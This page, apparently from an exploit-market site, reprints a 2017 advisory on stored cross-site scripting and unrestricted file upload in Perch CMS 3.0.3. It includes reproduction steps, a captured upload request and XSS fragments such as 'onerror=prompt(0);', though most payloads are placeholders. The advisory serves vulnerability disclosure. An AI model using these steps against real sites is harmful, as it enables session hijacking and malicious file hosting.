[ home ]  [ private ]  [ 0Day ]  [ discount ]  [ Get Gold ]  [ platforms ]  [ pentest ]  [ search ]  [ faq ]  [ contact ]  [ style ]  [ Prices in Gold ]   db: 39 583    
0day Today Exploit DB Official Facebook
0day Today Exploit DB Official Twitter
0day Today Exploit DB Official RSS Channel
Tor
We DO NOT use Telegram or any messengers / social networks!
We DO NOT use Telegram or any messengers / social networks!

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

 
0day.today - Biggest Exploit Database in the World.
Select your language:  
English
English
Русский
Русский
Deutsch
Deutsch
Türkçe
Türkçe
Français
Français
Italiano
Italiano
Español
Español
Romania
Romania
Polskie
Polskie
العربية
العربية
Japan
Japan
China
China
Things you should know about 0day.today:
  • We use one main domain: http://0day.today
  • Most of the materials is completely FREE
  • If you want to purchase the exploit / get V.I.P. access or pay for any other service,
    you need to buy or earn GOLD
We accept currencies: [contact admin to find more]
           
We don't want you to use our site as a tool for hacking purposes, so any kind of action that could affect illegaly other users or websites that you don't have right to access will be banned and your account including your data will be destroyed.

Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks! We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
I am registered user of 0day.today. I don't want to see this screen in future.
What to do first?
  1. Read the [ agreement ]
  2. Read the [ Submit ] rules
  3. Visit the [ faq ] page
  4. [ Register ] profile
  5. Get [ GOLD ]
  6. If you want to [ sell ]
  7. If you want to [ buy ]
  8. If you lost [ Account ]
  9. Any questions [ admin@0day.today ]


Main links


You can contact us by

Mail:
mr.inj3ct0r@gmail.com
Facebook:
Inj3ct0rs
Twitter:
Inj3ct0r
Telegram:
We DO NOT use Telegram or any messengers / social networks!
[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
Mail:
mr.inj3ct0r@gmail.com
Facebook:
Inj3ct0rs
Twitter:
Inj3ct0r
Telegram:
We DO NOT use Telegram or any messengers / social networks!
0day Today Exploits Market and 0day Exploits Database

Perch CMS 3.0.3 Cross Site Scripting / File Upload Vulnerabilities

Author
SaifAllah benMassaoud
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-27906
Category
web applications
Date add
07-06-2017
Platform
php
Document Title:
===============
Perch v3.0.3 CMS - Multiple Web Vulnerabilities


Vulnerability Class:
====================
Arbitrary File Upload


Product & Service Introduction:
===============================
Perch is a content management system designed for small websites as a drop-in solution. Perch Runway a fully featured CMS for larger content driven sites. 
They share a template language and many features - the main difference is the types of projects they are each designed for.

(Copy of the Homepage: https://docs.grabaperch.com )


Abstract Advisory Information:
==============================
The Vulnerability Laboratory discovered an unrestricted file upload & stored cross site scripting web vulnerabilities in the Perch v3.0.3 Content Management System.


Vulnerability Disclosure Timeline:
==================================
2017-05-29: Public Disclosure (Vulnerability Laboratory)


Affected Product(s):
====================
Edgeofmyseat
Product: Perch - Content Management System (Web-Application) 3.0.3



Technical Details & Description:
================================
An unrestricted file upload & stored cross site scripting vulnerabilities has been discovered in the official Perch v3.0.3 content management system.

The security vulnerability is located in the `Asset Title` input field & `Select File` upload file of the vulnerable `Adding a New Asset` module POST method request.
The `Asset Title` validation input field allows to execute any injected payload string code that is stored in the database management system. The `Select File` field 
is not parsed and allows a limited admin to upload unrestricted files to the web-server system.

The security risk of the stored cross site scripting & unrestricted file upload vulnerability is estimated as medium (CVSS 3.8). Exploitation of the (non-persistent & persistent) 
input validation web vulnerability requires a privileged web-application user account and medium user interaction. Successful exploitation of the vulnerability results 
in session hijacking, non-persistent and persistent phishing attacks, non-persistent and persistent external redirects to malicious source, non-persistent and persistent 
manipulation of affected or connected application modules.


Proof of Concept (PoC):
=======================
The unrestricted file upload & stored cross site scripting web vulnerabilities can be exploited by remote attackers with privileged user account and with Medium user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.


Manual steps to reproduce the vulnerability ...
1.  Install Perch CMS 
Note: Your Account is a "Primary Admin" 
2.  Login to the web-application 
3.  Add " Limited Admin " with Admin Role
4.  Add " UserLab " with Editor Role
    Log Out Your "Primary Admin" Account and Log in with "Limited Admin" Account
5.  Go To  ..assets/
6.  Add asset button
7.  Create a MALICIOUS SCRIPT CODE EXECUTION Title
8.  Upload any Malware or malicious file
9.  Click on Submit button  
10. Open The "UserLab & Primary Admin " Accounts
11. Go To Listing Assets
12. The execution of the vulnerability by an limited admin are Stored and published in all Users "Listing assets" module
13. Successful reproduce of the vulnerability!


PoC: Attack Scheme :
https://www.youtube.com/watch?v=klYQ6iXfjUI&feature=youtu.be

PoC: LimitedAdmin - Asset Title => (http://Perch-cms.localhost:8080/perch/core/apps/assets/edit/?id=)
<div class="smartbar"><ul><li><div class="breadcrumb tab-active"><a href="/perch/core/apps/assets/">Assets</a><svg role="img" width="8" height="8" class="icon icon-o-navigate-right"> <use 
xlink:href="/perch/core/assets/svg/core.svg#o-navigate-right"></use> </svg> <a href="/perch/core/apps/assets/edit/?id=">">[ SCRIPT CODE EXECUTION! ]</a></div></li></ul></div>

PoC: LimitedAdmin -Select File => (http://Perch-cms.localhost:8080/perch/core/apps/assets/edit/?id=)
<div class="asset-badge-meta"><h3 class="title"><a href="/perch/resources/poc2-3.html">">[ Unrestricted "Malware&Malicious" FileUpload! ]></a></h3><ul class="meta"><li><svg role="img" width="12" 
height="12" class="icon icon-o-document"> <use xlink:href="/perch/core/assets/svg/assets.svg#o-document"></use> </svg> Doc / HTML</li><li><svg role="img" width="12" height="12" class="icon icon-o-
weight-scale"> <use xlink:href="/perch/core/assets/svg/assets.svg#o-weight-scale"></use> </svg> 0<span class="unit">KB</span></li></ul> <span class="ft-choose-asset ft-file  assets-disabled" data-
type="doc" data-field="image_assetID" data-bucket="default" data-input="image"></span></div>


--- PoC Session Logs [POST] ---
POST /perch/core/apps/assets/edit/ HTTP/1.1
Host: Perch-cms.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:53.0) Gecko/20100101 Firefox/53.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Content-Type: multipart/form-data; boundary=---------------------------287332380928218
Content-Length: 1118
Referer: http://Perch-cms.localhost:8080/perch/core/apps/assets/edit/
Cookie: PHPSESSID=e6pok7gnvci66jb7noti2j0nu5; cmsa=1
Connection: keep-alive
-----------------------------287332380928218: undefined
Content-Disposition: form-data; name="resourceTitle"
[ SCRIPT CODE EXECUTION! ]
-----------------------------287332380928218
Content-Disposition: form-data; name="image"; filename="poc1.html"
Content-Type: text/html
[ Unrestricted "Malware&Malicious" FileUpload! ]
[Malicious Site + IP Adress/Redirection + File]:=[download]
-----------------------------287332380928218
Content-Disposition: form-data; name="image_field"
1
-----------------------------287332380928218
Content-Disposition: form-data; name="image_assetID"
-----------------------------287332380928218
Content-Disposition: form-data; name="resourceBucket"
default
-----------------------------287332380928218
Content-Disposition: form-data; name="tags"
-----------------------------287332380928218
Content-Disposition: form-data; name="btnsubmit"
Submit
-----------------------------287332380928218
Content-Disposition: form-data; name="formaction"
edit
-----------------------------287332380928218
Content-Disposition: form-data; name="token"
7860b50e7d1965fcc59ebf9c49be0034
-----------------------------287332380928218--
HTTP/1.1 200 OK
Server: ******
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
x-frame-options: deny
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8


PoC: Affected Accounts 
[+] Role : Primary Admin
[+] Vulnerable Modules(s): Listing assets

<main class="main-panel" id="main" aria-label="Content"><header class="title-panel"><h1>Listing assets</h1><div class="notifications"></div><div class="buttons"><a class="button button-icon icon-
left" href="/perch/core/apps/assets/edit/"><div><svg role="img" width="10" height="10" class="icon icon-plus"> <use xlink:href="/perch/core/assets/svg/core.svg#plus"></use> </svg><span>Add 
asset</span></div></a></div></header><div class="smartbar"><ul><li><div class="button-group button-toggle"><a href="/perch/core/apps/assets/?view=grid" class="button button-small toggle-
active"><svg role="img" width="12" height="12" class="icon icon-grid-big"> <use xlink:href="/perch/core/assets/svg/core.svg#grid-big"></use> </svg> Grid</a><a href="/perch/core/apps/assets/?
view=list" class="button button-small"><svg role="img" width="12" height="12" class="icon icon-menu"> <use xlink:href="/perch/core/assets/svg/core.svg#menu"></use> </svg> List</a></div></li><li><a 
href="/perch/core/apps/assets/?show-filter=atf" title="By Type"><svg role="img" width="14" height="14" class="icon icon-o-photo" title="By Type" aria-label="By Type"> <use 
xlink:href="/perch/core/assets/svg/assets.svg#o-photo"></use> </svg> <span>By Type</span></a></li><li><a href="/perch/core/apps/assets/?show-filter=bf" title="By Bucket"><svg role="img" width="14" 
height="14" class="icon icon-box-storage" title="By Bucket" aria-label="By Bucket"> <use xlink:href="/perch/core/assets/svg/core.svg#box-storage"></use> </svg> <span>By Bucket</span></a></li><li><a 
href="/perch/core/apps/assets/?show-filter=tf" title="By Tag"><svg role="img" width="14" height="14" class="icon icon-tag" title="By Tag" aria-label="By Tag"> <use 
xlink:href="/perch/core/assets/svg/core.svg#tag"></use> </svg> <span>By Tag</span></a></li></ul><div class="tab-content"><section role="tabpanel" class="tab-panel hidden" aria-hidden="true"><ul 
class="smartbar-filters"><li><a href="/perch/core/apps/assets/?type=img">Images</a></li><li><a href="/perch/core/apps/assets/?type=file">Files</a></li><li><a href="/perch/core/apps/assets/?
type=doc">Documents</a></li><li><a href="/perch/core/apps/assets/?type=sheet">Spreadsheets</a></li><li><a href="/perch/core/apps/assets/?type=audio">Audio</a></li><li><a 
href="/perch/core/apps/assets/?type=video">Video</a></li><li><a href="/perch/core/apps/assets/?type=pres">Presentations</a></li><li><a href="/perch/core/apps/assets/?
type=archive">Archives</a></li><li><a href="/perch/core/apps/assets/?type=html">HTML</a></li></ul></section><section role="tabpanel" class="tab-panel hidden" aria-hidden="true"><ul 
class="smartbar-filters"><li><a href="/perch/core/apps/assets/?bucket=default">Default</a></li></ul></section><section role="tabpanel" class="tab-panel hidden" aria-hidden="true"><ul 
class="smartbar-filters"><li><a href="/perch/core/apps/assets/?tag=onerrorprompt0">onerror=prompt(0);></a></li><li><a href="/perch/core/apps/assets/?tag=srcx">src=x</a></li><li><a 
href="/perch/core/apps/assets/?tag=ra-490d-e044">"><img< a=""></img<></a></li><div class="smartbar-actions"><a href="/perch/core/apps/assets/" class="button button-small"><svg role="img" 
width="12" height="12" class="icon icon-cancel"> <use xlink:href="/perch/core/assets/svg/core.svg#cancel"></use> </svg> Clear</a></div></ul></section></div></div><div class="inner asset-app-
listing"><div class="asset-grid"><a href="/perch/core/apps/assets/edit/?id=38"><div class="grid-asset asset-doc asset-display-thumbless" style="background-color: rgb(175, 175, 175);"><svg 
role="img" width="64" height="64" class="icon icon-o-document"> <use xlink:href="/perch/core/assets/svg/assets.svg#o-document"></use> </svg><div class="asset-meta">
<span class="title">"&gt[ SCRIPT CODE EXECUTION! ]></span></div></div></a></div><div class="paging-cont"></div></div></main>

[+] Vulnerable Input Field(s): Asset Title
<label for="resourceTitle" class="">Title <span class="required-value">(required)</span></label>
<input id="resourceTitle" name="resourceTitle" value=""[ SCRIPT CODE EXECUTION! ] required="" aria-required="true" class="text input-simple m" type="text">

[+] Vulnerable Input Field(s): Select File
<a href="/perch/resources/[ Unrestricted "Malware&Malicious" FileUpload! ]">">[Malicious Site + IP Adress/Redirection + File]:=[download]></a>

[+] Role : Editor
[+] Vulnerable Modules(s): Listing assets

<div class="inner asset-app-listing"><div class="asset-grid"><a href="/perch/core/apps/assets/edit/?id=38"><div class="grid-asset asset-doc asset-display-thumbless" style="background-color: rgb(175, 175, 175);"><svg role="img" width="64" height="64" class="icon icon-o-document"> <use xlink:href="/perch/core/assets/svg/assets.svg#o-document"></use> </svg><div class="asset-meta"><span class="title">">[ SCRIPT CODE EXECUTION! ]></span></div></div></a></div><div class="paging-cont"></div></div>

[+] Vulnerable Input Field(s): Asset Title
<div class="asset-meta"><span class="title">">[ SCRIPT CODE EXECUTION! ]></span></div>
<div class="form-entry">
<input id="resourceTitle" name="resourceTitle" value=""[ SCRIPT CODE EXECUTION! ]" required="" aria-required="true" class="text input-simple m" type="text">

#  0day.today [2024-11-16]  #
0day Today Exploit Database buy and sell exploits type (local, remote, DoS, PoC, etc.)
Send all submissions to mr.inj3ct0r[at]gmail.com
Copyright © 2008-2024 0day Today Team